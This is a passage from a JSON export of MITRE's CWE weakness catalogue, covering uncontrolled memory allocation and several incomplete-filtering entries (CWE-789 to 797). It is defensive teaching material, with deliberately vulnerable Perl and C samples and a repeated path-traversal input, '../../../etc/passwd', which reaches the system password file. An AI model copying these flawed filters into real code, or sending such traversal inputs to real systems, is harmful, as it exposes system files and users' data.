untrusted number that is used as an index into an array of messages.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $num = GetUntrustedNumber();my @messages = ();$messages[$num] = \\"Hello World\\";","xhtml:br":["","",""]}},"Body_Text":["The index is not validated at all (CWE-129), so it might be possible for an attacker to modify an element in @messages that was not intended. If an index is used that is larger than the current size of the array, the Perl interpreter automatically expands the array so that the large index works.","If $num is a large value such as 2147483648 (1&lt;&lt;31), then the assignment to $messages[$num] would attempt to create a very large array, then eventually produce an error message such as:","Out of memory during array extend","This memory exhaustion will cause the Perl program to exit, possibly a denial of service. In addition, the lack of memory could also prevent many other programs from successfully running on the system."]},{"Intro_Text":"This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function\'s action. The buffer length ends up being -1 resulting in a blown out stack. The space character after the colon is included  in the function calculation, but not in the caller\'s calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations.","Example_Code":[{"#text":"int proc_msg(char *s, int msg_len){}char *s = \\"preamble: message\\\\n\\";char *sl = strchr(s, \':\');        // Number of characters up to \':\' (not including space)int jnklen = sl == NULL ? 0 : sl - s;    // If undefined pointer, use zero lengthint ret_val = proc_msg (\\"s\\",  jnklen);    // Violate assumption of preamble length, end up with negative value, blow out stack","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"int pre_len = sizeof(\\"preamble: \\");    // Note space at the end of the string - assume all strings have preamble with space","attr":{"@_style":"margin-left:10px;"}},{"#text":"char buf[pre_len - msg_len];","attr":{"@_style":"margin-left:10px;"}},{"#text":"... Do processing here and set status","attr":{"@_style":"margin-left:10px;"}},{"#text":"return status;","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"int proc_msg(char *s, int msg_len){}char *s = \\"preamble: message\\\\n\\";char *sl = strchr(s, \':\');        // Number of characters up to \':\' (not including space)int jnklen = sl == NULL ? 0 : sl - s;    // If undefined pointer, use zero lengthint ret_val = proc_msg (\\"s\\",  jnklen);    // Violate assumption of preamble length, end up with negative value, blow out stack","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"int pre_len = sizeof(\\"preamble: \\");    // Note space at the end of the string - assume all strings have preamble with space","attr":{"@_style":"margin-left:10px;"}},{"#text":"if (pre_len &lt;= msg_len) { // Log error; return error_code; }","attr":{"@_style":"margin-left:10px;"}},{"#text":"char buf[pre_len - msg_len];","attr":{"@_style":"margin-left:10px;"}},{"#text":"... Do processing here and set status","attr":{"@_style":"margin-left:10px;"}},{"#text":"return status;","attr":{"@_style":"margin-left:10px;"}}]}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-3701","Description":"program uses ::alloca() for encoding messages, but large messages trigger segfault","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3701"},{"Reference":"CVE-2008-1708","Description":"memory consumption and daemon exit by specifying a large value in a length field","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1708"},{"Reference":"CVE-2008-0977","Description":"large value in a length field leads to memory consumption and crash when no more memory is available","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0977"},{"Reference":"CVE-2006-3791","Description":"large key size in game program triggers crash when a resizing function cannot allocate enough memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3791"},{"Reference":"CVE-2004-2589","Description":"large Content-Length HTTP header value triggers application crash in instant messaging application due to failure in memory allocation","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2589"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":35,"Entry_Name":"SOAP Array Abuse"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS32-PL","Entry_Name":"Validate any integer that is used as an array index","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-789"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, &#34;Resource Limits&#34;, Page 574"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-789"}}]},"Notes":{"Note":[{"#text":"This weakness can be closely associated with integer overflows (CWE-190). Integer overflow attacks would concentrate on providing an extremely large number that triggers an overflow that causes less memory to be allocated than expected. By providing a large value that does not trigger an integer overflow, the attacker could still cause excessive amounts of memory to be allocated.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"Uncontrolled memory allocation is possible in many languages, such as dynamic array allocation in perl or initial size parameters in Collections in Java. However, languages like C and C++ where programmers have the power to more directly control memory management will be more susceptible."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-10-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"Uncontrolled Memory Allocation","attr":{"@_Date":"2020-12-10"}}}},"790":{"attr":{"@_ID":"790","@_Name":"Improper Filtering of Special Elements","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not filter or incorrectly filters special elements before sending it to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"791":{"attr":{"@_ID":"791","@_Name":"Incomplete Filtering of Special Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not completely filter special elements before sending it to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"790","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"792":{"attr":{"@_ID":"792","@_Name":"Incomplete Filtering of One or More Instances of Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not completely filter one or more instances of special elements before sending it to a downstream component.","Extended_Description":{"xhtml:p":"Incomplete filtering of this nature involves either:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["only filtering a single instance of a special element when more exist, or","not filtering all instances or all elements where multiple special elements exist."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"791","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"793":{"attr":{"@_ID":"793","@_Name":"Only Filtering One Instance of a Special Element","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but only filters a single instance of a special element before sending it to a downstream component.","Extended_Description":"Incomplete filtering of this nature may be location-dependent, as in only the first or last element is filtered.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"792","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"794":{"attr":{"@_ID":"794","@_Name":"Incomplete Filtering of Multiple Instances of Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not filter all instances of a special element before sending it to a downstream component.","Extended_Description":{"xhtml:p":"Incomplete filtering of this nature may be applied to:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["sequential elements (special elements that appear next to each other) or","non-sequential elements (special elements that appear multiple times in different locations)."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"792","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"795":{"attr":{"@_ID":"795","@_Name":"Only Filtering Special Elements at a Specified Location","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but only accounts for special elements at a specified location, thereby missing remaining special elements that may exist before sending it to a downstream component.","Extended_Description":{"xhtml:p":["A filter might only account for instances of special elements when they occur:","This may leave special elements in the data that did not match the filter position, but still may be dangerous."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["relative to a marker (e.g. \\"at the beginning/end of string; the second argument\\"), or","at an absolute position (e.g. \\"byte number 10\\")."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"791","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-3"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter a \\"../\\" element located at the beginning of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/^\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression is only looking for an instance of \\"../\\" at the beginning of the string, it only removes the first \\"../\\" element. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-4"},"Intro_Text":"The following code takes untrusted input and uses a substring function to filter a 3-character \\"../\\" element located at the 0-index position of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();if (substr($Username, 0, 3) eq \'../\') {}my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""],"xhtml:div":{"#text":"$Username = substr($Username, 3);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the if function is only looking for a substring of \\"../\\" between the 0 and 2 position, it only removes that specific \\"../\\" element. So an input value such as:","will have the first \\"../\\" filtered, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22)."]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"796":{"attr":{"@_ID":"796","@_Name":"Only Filtering Special Elements Relative to a Marker","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but only accounts for special elements positioned relative to a marker (e.g. \\"at the beginning/end of a string; the second argument\\"), thereby missing remaining special elements that may exist before sending it to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"795","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-3"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter a \\"../\\" element located at the beginning of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/^\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression is only looking for an instance of \\"../\\" at the beginning of the string, it only removes the first \\"../\\" element. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"797":{"attr":{"@_ID":"797","@_Name":"Only Filtering Special Elements at an Absolute Position","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but only accounts for special elements at an absolute position (e.g. \\"byte number 10\\"), thereby missing remaining special elements that may exist before sending it to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"795","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-4"},"Intro_Text":"The following code takes untrusted input and uses a substring function to filter a 3-character \\"../\\" element located at the 0-index position of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();if (substr($Username, 0, 3) eq \'../\') {}my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""],"xhtml:div":{"#text":"$Username = substr($Username, 3);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the if function is only looking for a substring of \\"../\\" between the 0 and 2 position, it only removes that specific \\"../\\" element. So an input value such as:","will have the first \\"../\\" filtered, 